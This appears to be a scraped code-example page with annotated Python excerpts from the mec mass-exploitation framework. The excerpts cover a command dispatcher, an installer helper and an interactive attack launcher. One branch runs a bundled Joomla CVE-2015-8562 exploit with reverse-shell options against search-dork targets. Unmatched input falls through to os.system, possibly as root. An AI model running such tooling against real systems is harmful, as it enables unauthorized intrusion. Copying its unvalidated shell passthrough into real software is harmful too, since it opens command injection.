            # argument list with shell=False: no shell parsing of the paths.
            # NOTE(review): both pipes are created but never read in this
            # function
            subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             shell=False)
        except BaseException as err:
            console.print_error('[-] Error starting Shadowsocks proxy: ' +
                                str(err))
            debug_except()

    elif cmd == 'redis':
        console.print_error('[-] Under development')

    elif cmd.startswith('google'):
        try:
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            # runs a bundled script with hard-coded listener options; only
            # the dork comes from the operator
            subprocess.call([
                './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork,
                '--revshell=\'127.0.0.1\'', '--port=4444'
            ])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()

    elif cmd in ('q', 'quit'):
        # stop the proxy helper before leaving
        check_kill_process('ss-proxy')
        sys.exit(0)

    elif cmd in ('h', 'help', '?'):
        print(console.HELP_INFO)

    elif cmd == 'exploits':
        colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in list_exp():
            colored_print(poc, colors.BLUE)

    elif cmd in ('z', "zoomeye"):
        try:
            console.print_warning(
                "[*] ZoomEye now asks for phone verification (+86 only)")
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        # NOTE(review): this `else` runs when zoomeye.run() raised nothing,
        # so debug_except() is called on success -- looks unintended, confirm
        else:
            debug_except()
    elif cmd == "censys":
        try:
            output = censys.start()
            if yes_no("Use collected URL's as target?"):
                SESSION.ip_list = SESSION.init_dir + "/" + output
                colored_print(
                    '[i] Target changed to {}'.format(SESSION.ip_list),
                    colors.BLUE)

        # NOTE(review): every failure, programming errors included, is
        # discarded here without a message
        except BaseException:
            return
    elif cmd in ('x', 'reset'):
        os.system("reset")

    elif cmd in ('c', 'clear'):
        os.system("clear")

    elif cmd in ("attack", "e"):
        attack()

    else:
        # fallback: the (lower-cased) line is executed by the system shell
        # with the privileges of the mec process -- root when mec was started
        # as root for masscan. This is a shell passthrough; nothing here
        # validates or restricts the input.
        try:
            print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END,
                  colors.GREEN + cmd, colors.END)
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
Esempio n. 27
def pip_install(venv_py, pkg):
    '''
    run "<venv_py> -m pip install <pkg>" through the shell

    The exit status is not checked. Both arguments are interpolated into
    the command line unquoted, so they must be installer-controlled values.
    '''
    colors.colored_print(f"Installing {pkg} ... ", colors.BLUE)
    command_line = f'{venv_py} -m pip install {pkg}'
    os.system(command_line)
Esempio n. 28
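def mod_exists(modulename):
    '''
    check if a module exists without importing it

    Returns True when an import spec is found, False otherwise. For a
    dotted name the parent packages are imported by find_spec; a missing
    parent counts as "does not exist" instead of raising.
    '''
    try:
        return util.find_spec(modulename) is not None
    except ImportError:
        # find_spec("pkg.sub") raises ModuleNotFoundError when "pkg" itself
        # cannot be imported
        return False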


# distro check and initial packages
# Determine the distribution id (DIST). "debian" is only the initial value;
# it is overwritten by one of the two lookups at the bottom.
DIST = "debian"
try:
    import distro

except ModuleNotFoundError:
    # NOTE(review): this installs an unpinned package from the configured
    # index as a side effect of running the installer; a non-zero exit is
    # treated as "pip is missing"
    if os.system("python3 -m pip install distro --user") != 0:
        colors.colored_print("Please install pip first !!!", colors.RED)
        sys.exit(1)
    # import only if the fresh install is visible to this interpreter;
    # otherwise `distro` stays undefined and the NameError path below runs
    if mod_exists("distro"):
        import distro

except ImportError:
    # NOTE(review): ModuleNotFoundError (3.6+) is a subclass of ImportError,
    # so this branch only sees other import failures
    colors.colored_print("Please use python 3.6+ !!!", colors.RED)
    sys.exit(1)

try:
    DIST = distro.linux_distribution(full_distribution_name=False)[0]
except NameError:
    # `distro` was never imported: fall back to the standard library
    import platform
    # NOTE(review): platform.linux_distribution was removed in Python 3.8,
    # so this fallback raises AttributeError on current interpreters
    # pylint: disable=deprecated-method, no-member
    DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
Esempio n. 29
File: core.py Progetto: jm33-m0/mec
    def attack(self):
        '''
        handles attack command

        Interactive flow: ask whether to use the proxy, ask for the delay
        between process launches, then either run one of the built-in
        modules or assemble a Scanner job for a module chosen by path.
        Returns None on every path.
        '''
        self.use_proxy = console.yes_no(
            '[?] Do you wish to use proxy_pool/proxychains?')

        if self.use_proxy:
            # refuse to continue when the proxychains4 binary is not on PATH
            if shutil.which("proxychains4") is None:
                console.print_error("proxychains4 not found")

                return

        # sleep between two subprocess open
        sleep_seconds = console.input_check("\n[?] Wait how many seconds" +
                                            " before each process launch?\n" +
                                            "    (Set it to 0 when you want to use 100% CPU" +
                                            " / bandwidth\n    Recommened value: 0.1)\n" +
                                            "\n[=] Your input: ",
                                            check_type=float)
        answ = console.input_check(
            '\n[?] Do you wish to use\
            \n\n    [1] built-in exploits\
            \n    [2] or launch your own manually?\
            \n\n[=] Your choice: ',
            choices=['1', '2', 'built-in', 'manually'])

        if answ in ['1', 'built-in']:
            print(
                colors.CYAN +
                colors.BOLD +
                '\n[?] Choose a module from: ' +
                colors.END +
                '\n')
            colors.colored_print(futil.BUILT_IN, colors.GREEN)
            # choices are the lines of futil.BUILT_IN
            module = console.input_check(
                "[?] Choose your exploit module: ",
                choices=futil.BUILT_IN.split('\n'),
                allow_blank=False)

            try:
                # NOTE(review): .get() returns None for a name that is listed
                # in BUILT_IN but missing from EXPLOIT_DICT, and calling None
                # raises TypeError, which is not caught below
                scanner_instance = exploit_exec.EXPLOIT_DICT.get(module)(self)

                # a module builder may return None to cancel the job
                if scanner_instance is None:
                    return

                scanner_instance.sleep_seconds = sleep_seconds
                scanner_instance.scan()

                return

            except (EOFError, KeyboardInterrupt, SystemExit):
                return

        # run custom exploits
        print(
            colors.CYAN +
            colors.UNDERLINE +
            colors.BOLD +
            "\nWelcome, in here you can invoke your own exploit\n" +
            colors.END)
        cmd.run_exploits()

        # the path is restricted to the entries futil.list_exp() returns
        exploit = console.input_check(
            "\n[*] Enter the path (eg. test/test) to your exploit: ",
            choices=futil.list_exp())

        jobs = int(
            console.input_check("[?] How many processes each time? ", check_type=int))

        # extra arguments are split on whitespace only; quoting is not
        # honoured
        custom_args = console.input_check(
            "[*] Addtional args for this exploit (other than `-t <target>`): ").strip().split()

        # parse user's exploit name
        # exec_path drops the first path component, work_path the last one;
        # for "test/test" both become "test". With more than two components
        # the two values overlap.
        exec_path = exploit.split('/')[1:]
        work_path = exploit.split('/')[:-1]
        exec_path = '/'.join(exec_path)
        work_path = '/'.join(work_path)

        # args as parameter for scanner
        scanner_instance = Scanner(work_path, exec_path,
                                   custom_args,
                                   jobs, sleep_seconds, self)
        # start scanner
        scanner_instance.scan()